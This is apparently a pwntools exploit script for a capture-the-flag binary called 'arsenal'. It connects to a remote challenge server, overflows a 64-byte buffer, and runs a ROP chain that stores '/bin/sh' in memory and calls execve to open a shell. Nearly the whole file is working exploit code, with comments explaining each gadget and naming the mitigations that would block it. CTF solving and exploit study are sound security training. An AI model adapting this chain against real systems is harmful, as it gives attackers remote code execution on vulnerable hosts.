from pwn import *

# Number of padding bytes emitted before the saved return address is
# overwritten (assumes the overflowed buffer sits 64 bytes below it — TODO
# confirm the offset against the target's stack frame).
OFF = 64

# Load the challenge binary. checksec=False only silences pwntools' printout
# of the binary's hardening flags (RELRO/canary/NX/PIE); it changes nothing
# about the binary itself.
context.binary = elf = ELF("./arsenal", checksec=False)

# NUL-terminated program path; exactly 8 bytes so it fits one register-sized
# stack slot in the chain below.
shellstr = b"/bin/sh\x00"

# ROP gadget addresses. Their semantics are inferred from the variable names;
# only mov_qword_ptr_rdx_rax below carries its disassembly in a comment.
# All of them are absolute constants, so the chain presupposes that the
# binary is mapped at a fixed address (i.e. built without PIE) — presumably
# true for this target, but not verifiable from this script. From a hardening
# standpoint, PIE/ASLR (moving the gadgets) and a stack canary (detecting the
# overwrite before the return) are the mitigations that defeat exactly the
# two assumptions this chain depends on.
ret = 0x000000000040101A      # lone `ret`; presumably a padding/alignment slot — confirm
pop_rdi = 0x000000000040196E  # presumably `pop rdi; ret`
pop_rsi = 0x0000000000401977  # presumably `pop rsi; ret`
pop_rdx = 0x0000000000401980  # presumably `pop rdx; ret`
pop_rax = 0x0000000000401989  # Assign 59 (execve) to rax (also used once to load shellstr)
syscall = 0x0000000000401324  # presumably a `syscall` instruction
WRITE_ADDR = 0x4AA000         # address the chain treats as writable; receives shellstr

# p = process(elf.path)  # local run against the on-disk binary; left disabled
p = remote("offsec.m0lecon.it", 13594)  # challenge service endpoint

# Consume (and echo, for debugging) the service banner before sending anything.
print(p.recvuntil(b"[arsenal] The armory is open -- pick your weapons:\n"))

mov_qword_ptr_rdx_rax = 0x000000000040AB18  # mov qword ptr [rdx], rax; ret

# Two-stage chain:
#   1. store shellstr at WRITE_ADDR: rdx = destination, rax = the 8-byte
#      string, then the store gadget writes rax to [rdx];
#   2. raw execve syscall: rax = 0x3B (59), rdi = pointer to the stored path,
#      rsi = 0 (argv), rdx = 0 (envp), then `syscall`.
# The slot order is the stack layout the gadgets pop from, so it must not be
# reordered.
payload = flat(
    b"A" * OFF,  # padding up to the saved return address
    p64(ret),
    p64(pop_rdx),
    p64(WRITE_ADDR),
    p64(pop_rax),
    shellstr,  # popped into rax as raw bytes (8 bytes, see above)
    p64(mov_qword_ptr_rdx_rax),  # Write /bin/sh to a writable address in memory
    p64(pop_rax),
    p64(0x3B),  # 59 is the execve syscall
    p64(pop_rdi),
    p64( WRITE_ADDR ),  # Address where I wrote /bin/sh so in RDI there is a pointer (char*)
    p64(pop_rsi),
    p64(0),  # argv = NULL
    p64(pop_rdx),
    p64(0),  # envp = NULL
    p64(syscall),
)
p.sendline(payload)
p.interactive()  # hand the connection over to the user